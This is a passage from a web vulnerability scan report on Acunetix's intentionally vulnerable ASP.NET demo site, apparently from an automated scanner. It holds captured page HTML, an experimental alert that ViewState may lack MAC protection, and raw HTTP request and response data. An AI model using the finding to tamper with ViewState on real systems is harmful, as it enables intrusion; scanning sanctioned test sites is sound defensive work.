3RlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZXNzIHRoYW4gb2ZmLXRoZS1zaGVsZiBzb2Z0d2FyZSBhbmQgYXJlIHRoZXJlZm9yZSBtb3JlICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN1c2NlcHRpYmxlIHRvIGF0dGFjay48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+JnF1b3Q7Q29tcGFuaWVzIGhhdmUgaW1wbGVtZW50ZWQgbmV0d29yay1sZXZlbCBzZWN1cml0eSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaG93ZXZlciB0aGV5IGZhaWwgdG8gYXVkaXQgYW5kIHNlY3VyZSB0aGVpciB3ZWIgYXBwbGljYXRpb25zLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBUaGVzZSBhcHBsaWNhdGlvbnMgaGF2ZSBhY2Nlc3MgdG8gc2Vuc2l0aXZlIGRhdGEgYW5kICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFyZSBhIGhhY2tlcidzIHByaW1lIHRhcmdldCwmcXVvdDsgc2FpZCBOaWNrIEdhbGVhLCAgICAgICAgICAgICAgICAgICAgICAgICAgICBDRU8gb2YgQWN1bmV0aXguICZxdW90O0F1ZGl0aW5nIG9uZSdzIHdlYiBhcHBzIHNob3VsZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBiZSB0aGUgbnVtYmVyIG9uZSBzZWN1cml0eSBjb25jZXJuLiZxdW90OzwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlRoZSBuZWVkIGZvciBhbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHZ1bG5lcmFiaWxpdHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgc2Nhbm5lcjwvc3Ryb25nPjxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIE1hbnVhbGx5IGF1ZGl0aW5nIGEgd2ViIGFwcGxpY2F0aW9uIGZvciB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdG8gU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiAgICAgICAgICAgICAgICAgICAgICAgICAgICBhdHRhY2tzIGlzIHZpcnR1YWxseSBpbXBvc3NpYmxlLiBXaXRoIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5ICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNjYW5uZXIgdGhlIHByb2Nlc3Mgb2YgYXVkaXRpbmcgd2ViIGFwcGxpY2F0aW9ucyBzdWNoICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFzIHNob3BwaW5nIGNhcnRzIGFuZCBmb3JtcywgY2FuIGJlIGVhc2lseSBhdXRvbWF0ZWQuICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdoYXQncyBtb3JlLCB0aGUgc2VjdXJpdHkgY2hlY2tzIGNhbiBlYXNpbHkgYmUgcmUtbGF1bmNoZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGVhY2ggYXBwbGljYXRpb24gdXBkYXRlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkhvdyBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIHdvcmtzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGZpcnN0IGNyYXdscyB0aGUgd2hvbGUgd2Vic2l0ZSwgYW5hbHl6ZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW4tZGVwdGggZWFjaCBmaWxlIGl0IGZpbmRzLCBhbmQgZGlzcGxheXMgdGhlIGVudGlyZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB3ZWJzaXRlIHN0cnVjdHVyZS4gQWZ0ZXIgdGhpcyBkaXNjb3Zlcnkgc3RhZ2UsIGl0IHBlcmZvcm1zICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFuIGF1dG9tYXRpYyBhdWRpdCBmb3IgY29tbW9uIHNlY3VyaXR5IHZ1bG5lcmFiaWxpdGllcy48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BdXRvbWF0aWNhbGx5IGRldGVjdHMgU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiB2dWxuZXJhYmlsaXRpZXM8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBTUUwgaW5qZWN0aW9uIGlzIGEgaGFja2luZyB0ZWNobmlxdWUgd2hpY2ggbW9kaWZpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgU1FMIGNvbW1hbmRzIGluIG9yZGVyIHRvIGdhaW4gYWNjZXNzIHRvIGRhdGEgaW4gdGhlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGFiYXNlLiBDcm9zcyBzaXRlIHNjcmlwdGluZyBhdHRhY2tzIGFsbG93IGEgaGFja2VyICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRvIGV4ZWN1dGUgYSBtYWxpY2lvdXMgc2NyaXB0IG9uIHlvdXIgdmlzaXRvcnMnIGJyb3dzZXIuICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgY2FuIGNoZWNrIGlmIHlvdXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGlzIHZ1bG5lcmFibGUgdG8gYm90aCBvZiB0aGVzZSBhdHRhY2tzLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBNb3JlIGluZm9ybWF0aW9uIGFib3V0IGNyb3NzIHNpdGUgc2NyaXB0aW5nICZhbXA7IFNRTCAgICAgICAgICAgICAgICAgICAgICAgICAgICBpbmplY3Rpb24gYXQgb3VyIHdlYnNpdGUgc2VjdXJpdHkgaW5mbyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgYWxzbyBjaGVja3MgZm9yICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRoZSBmb2xsb3dpbmcgd2ViIGF0dGFja3M6PC9zdHJvbmc+PC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDx1bD4gPGxpPkNSTEYgaW5qZWN0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5Db2RlIGV4ZWN1dGlvbiBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RGlyZWN0b3J5IHRyYXZlcnNhbCBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RmlsZSBpbmNsdXNpb24gYXR0YWNrczxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvbGk+PGxpPiBJbnB1dCB2YWxpZGF0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5BdXRoZW50aWNhdGlvbiBhdHRhY2tzLjwvbGk+IDwvdWw+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BZHZhbmNlZCBwZW5ldHJhdGlvbiB0ZXN0aW5nIHRvb2xzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGFsc28gaW5jbHVkZXMgdG9vbHMgc3VjaCBhcyBhbiBIVFRQIGVkaXRvciAgICAgICAgICAgICAgICAgICAgICAgICAgICAmYW1wOyBIVFRQIHNuaWZmZXIgdG8gYWxsb3cgY3VzdG9taXphdGlvbiBvZiB3ZWIgdnVsbmVyYWJpbGl0eSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjaGVja3MuIFVzaW5nIHRoZSBWdWxuZXJhYmlsaXR5IGVkaXRvciwgbmV3IGF0dGFja3MgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FuIGVhc2lseSBiZSBjcmVhdGVkLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlByaWNpbmcgJmFtcDsgYXZhaWxhYmlsaXR5PC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGlzIGF2YWlsYWJsZSBhcyBhbiBlbnRlcnByaXNlIG9yIGFzIGEgY29uc3VsdGFudCAgICAgICAgICAgICAgICAgICAgICAgICAgICB2ZXJzaW9uLiBBIHN1YnNjcmlwdGlvbiBiYXNlZCBsaWNlbnNlIGNhbiBiZSBwdXJjaGFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGFzIGxpdHRsZSBhcyAkMzk1LCB3aGVyZWFzIGEgcGVycGV0dWFsIGxpY2Vuc2Ugc3RhcnRzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGF0ICQyOTk1LiBGb3IgbW9yZSBpbmZvcm1hdGlvbiB2aXNpdCBvdXIgcHJpY2luZyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD5kAgkPDxYCHgtOYXZpZ2F0ZVVybAUSQ29tbWVudHMuYXNweD9pZD0yZGQCCw8WAh4Dc3JjBQxhZHMvZGVmLmh0bWxkZCqQXr9Bo+fii5vVAAhGyfGRVNk1" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLjj6S6DAK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q944e4UqgWJpySuZGYD9y7m9ZXo/Q==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>11/8/2005 11:35:22 AM</DIV>
          						<DIV id="divNewsTitle" class="NewsTitle">Web attacks - can your web applications withstand the force?</DIV>
          						<DIV id="divNewsLong" class="NewsLong"><p><strong>Acunetix combats rise in web attacks with Acunetix                            Web Vulnerability Scanner 2 </strong></p>                           <p>21 July 2005 - <strong>Start-up company Acunetix released                            Acunetix Web Vulnerability Scanner: a tool to automatically                            audit website security. Acunetix Web Vulnerability Scanner                            2 crawls an entire website, launches popular web attacks                            (SQL Injection etc.) and identifies vulnerabilities                            that need to be fixed.</strong> </p>                           <p><strong>Securing your website should be your number one                            concern</strong><br />                           Hackers are concentrating their efforts on web-based                            applications - 75% of cyber attacks are done at the                            web application level, a Gartner Group study has revealed.                            Web applications are accessible 24 hours a day, 7 days                            a week and control valuable data such as customer information,                            transaction information and even proprietary corporate                            data.</p>                           <p><strong>500,000 customer credit card numbers obtained via                            a web attack</strong><br />                           Well-known sites that were open to web application attacks                            include fashion label Guess and pet supply retailer                            PetCo.com who were notoriously found to be vulnerable                            to the SQL injection vulnerability (June 2003). This                            resulted in PetCo leaving as many as 500,000 credit                            card numbers open to anyone able to construct this specially-crafted                            URL.</p>                           <p><strong>Firewalls, SSL and locked-down servers are futile                            against web application hacking</strong><br />                           Any defense at network security level will provide no                            protection against web application attacks since they                            are launched on port 80 - which has to remain open.                            In addition, web applications (customer areas, shopping                            carts etc.) are often tailor-made, invariably tested                            less than off-the-shelf software and are therefore more                            susceptible to attack.</p>                           <p>&quot;Companies have implemented network-level security,                            however they fail to audit and secure their web applications.                            These applications have access to sensitive data and                            are a hacker's prime target,&quot; said Nick Galea,                            CEO of Acunetix. &quot;Auditing one's web apps should                            be the number one security concern.&quot;</p>                           <p><strong>The need for an automated web application vulnerability                            scanner</strong><br />                           Manually auditing a web application for vulnerabilities                            to SQL injection, cross site scripting and other web                            attacks is virtually impossible. With Acunetix Web Vulnerability                            Scanner the process of auditing web applications such                            as shopping carts and forms, can be easily automated.                            What's more, the security checks can easily be re-launched                            for each application update.</p>                           <p><strong>How Acunetix Web Vulnerability Scanner works</strong><br />                           Acunetix WVS first crawls the whole website, analyzes                            in-depth each file it finds, and displays the entire                            website structure. After this discovery stage, it performs                            an automatic audit for common security vulnerabilities.</p>                           <p><strong>Automatically detects SQL injection, cross site                            scripting and other web vulnerabilities</strong><br />                           SQL injection is a hacking technique which modifies                            SQL commands in order to gain access to data in the                            database. Cross site scripting attacks allow a hacker                            to execute a malicious script on your visitors' browser.                            Acunetix Web Vulnerability Scanner can check if your                            web application is vulnerable to both of these attacks.                            More information about cross site scripting &amp; SQL                            injection at our website security info page.</p>                           <p><strong>Acunetix Web Vulnerability Scanner also checks for                            the following web attacks:</strong></p>                           <ul> <li>CRLF injection attacks<br />                           </li><li>Code execution attacks<br />                           </li><li>Directory traversal attacks<br />                           </li><li>File inclusion attacks<br />                           </li><li> Input validation attacks<br />                           </li><li>Authentication attacks.</li> </ul>                           <p><strong>Advanced penetration testing tools</strong><br />                           Acunetix WVS also includes tools such as an HTTP editor                            &amp; HTTP sniffer to allow customization of web vulnerability                            checks. Using the Vulnerability editor, new attacks                            can easily be created.</p>                           <p><strong>Pricing &amp; availability</strong><br />                           Acunetix WVS is available as an enterprise or as a consultant                            version. A subscription based license can be purchased                            for as little as $395, whereas a perpetual license starts                            at $2995. For more information visit our pricing page.</p>                           <p><strong>About Acunetix</strong></p>     <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise&rsquo;s ability to comprehensively manage, prioritize, and control vulnerability threats &ndash; ordered by business criticality.</p></DIV>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<a id="hlComments" href="Comments.aspx?id=2">Read user comments</a></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          						<center>
          						<iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe>
          						</center>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Solution

          Ensure the MAC is set for all pages on this website.

        11. POST http://testaspnet.vulnweb.com/about.aspx
          Alert tags
          Alert description

          *** EXPERIMENTAL ***

          This website uses ASP.NET's Viewstate but maybe without any MAC.

          Request
          Request line and header section (397 bytes)
          POST http://testaspnet.vulnweb.com/about.aspx HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Content-Type: application/x-www-form-urlencoded
          Referer: http://testaspnet.vulnweb.com/about.aspx
          Content-Length: 1027
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (1027 bytes)
          __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZLDaiLtIJBFGHdHW8BBidJDZ856t&__VIEWSTATEGENERATOR=E809BCA5&__EVENTVALIDATION=%2FwEWVwKqq9H0CQK746uPDALtiZ78CwKo4Jb%2FDwKo4Jb%2FDwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ%2F2grLtTL%2BjO092JULZB%2B%2Bks9UGJw%3D%3D
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
